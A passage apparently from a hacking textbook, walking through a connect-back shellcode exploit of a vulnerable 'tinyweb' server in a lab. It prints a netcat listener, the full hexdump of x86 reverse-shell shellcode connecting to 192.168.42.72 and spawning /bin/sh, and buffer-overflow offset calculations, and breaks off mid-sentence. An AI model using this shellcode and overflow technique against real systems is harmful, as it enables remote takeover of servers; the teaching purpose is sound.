Graphics Programs Reference
In-Depth Information
Since these values are stored in network byte order but the
x
86 archi-
tecture is in little-endian order, the stored DWORD seems to be reversed. This
means the DWORD for 192.168.42.72 is
0x482aa8c0
. This also applies for the
two-byte WORD used for the destination port. When the port number 31337
is printed in hexadecimal using gdb, the byte order is shown in little-endian
order. This means the displayed bytes must be reversed, so WORD for 31337
is
0x697a
.
The netcat program can also be used to listen for incoming connections
with the
-l
command-line option. This is used in the output below to listen
on port 31337 for the connect-back shellcode. The
ifconfig
command ensures
the IP address of eth0 is 192.168.42.72 so the shellcode can connect back to it.
reader@hacking:~/booksrc $ sudo ifconfig eth0 192.168.42.72 up
reader@hacking:~/booksrc $ ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:01:6C:EB:1D:50
inet addr:192.168.42.72 Bcast:192.168.42.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:16
reader@hacking:~/booksrc $ nc -v -l -p 31337
l
istening on [any] 31337 ...
Now, let's try to exploit the tinyweb server program using the connect-
back shellcode. From working with this program before, we know that the
request buffer is 500 bytes long and is located at
0xbffff5c0
in stack memory.
We also know that the return address is found within 40 bytes of the end of
the buffer.
reader@hacking:~/booksrc $ nasm connectback_shell.s
reader@hacking:~/booksrc $ hexdump -C connectback_shell
00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|
00000010 96 6a 66 58 43 68 c0 a8 2a 48 66 68 7a 69 66 53 |.jfXCh..*HfhzifS|
00000020 89 e1 6a 10 51 56 89 e1 43 cd 80 87 f3 87 ce 49 |..j.QV..C......I|
00000030 b0 3f cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 |.?..Iy...Rh//shh|
00000040 2f 62 69 6e 89 e3 52 89 e2 53 89 e1 cd 80 |/bin..R..S....|
0000004e
reader@hacking:~/booksrc $ wc -c connectback_shell
78 connectback_shell
reader@hacking:~/booksrc $ echo $(( 544 - (4*16) - 78 ))
402
reader@hacking:~/booksrc $ gdb -q --batch -ex "p /x 0xbffff5c0 + 200"
$1 = 0xbffff688
reader@hacking:~/booksrc $
Since the offset from the beginning of the buffer to the return address is
540 bytes, a total of 544 bytes must be written to overwrite the four-byte return
address. The return address overwrite also needs to be properly aligned, since
